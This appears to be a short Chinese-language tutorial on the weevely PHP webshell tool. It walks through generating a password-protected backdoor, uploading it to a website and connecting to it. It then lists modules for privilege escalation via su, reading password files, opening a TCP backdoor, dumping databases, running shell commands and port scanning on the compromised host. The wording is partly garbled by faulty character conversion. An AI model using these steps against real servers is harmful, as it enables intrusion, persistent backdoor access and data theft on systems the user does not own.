簡介
weevely 屬于php 的 webshell 工具。但相較于 webacoo ,weevely 的功能更加強大,同時對于webshell的連接配接設立了密碼選項!并且攜帶了大量的管理子產品,為滲透帶來了更多的驚喜與便利.
使用步驟:
第一步
[email protected]# weevely generate [password] /root/xx.php #//生成xx.php的backdoor 密碼為password
第二步
upload backdoor to website and get backdoor url path
第三步
establish session with website
weevely [backdoor url path] password
其強大的管理子產品!使用 help 指令來檢視可用子產品
:audit_phpconf? 審計PHP配置檔案
:audit_suidsgid? 通過SUID和SGID來查找檔案
:audit_etcpasswd? 通過其它手段擷取PASSWD
:audit_filesystem? 錯誤權限的審計系統檔案
:shell_su 利用SU指令提權
:shell_php? 執行PHP指令
:shell_sh? 執行shell指令
:system_extensions? 收集PHP和web伺服器的延伸清單
:system_info? 收集系統資訊
:backdoor_tcp 在TCP類端口生成一個後門
:sql_dump 導出資料表
:sql_console 執行SQL查詢指令或啟動控制台
:net_ifconfig? 擷取目标網絡位址
:net_proxy? 通過本地HTTP進行代理
:net_scan? TCP端口掃描
:net_curl? 遠端執行HTTP請求
:net_phpproxy? 在目标系統安裝PHP代理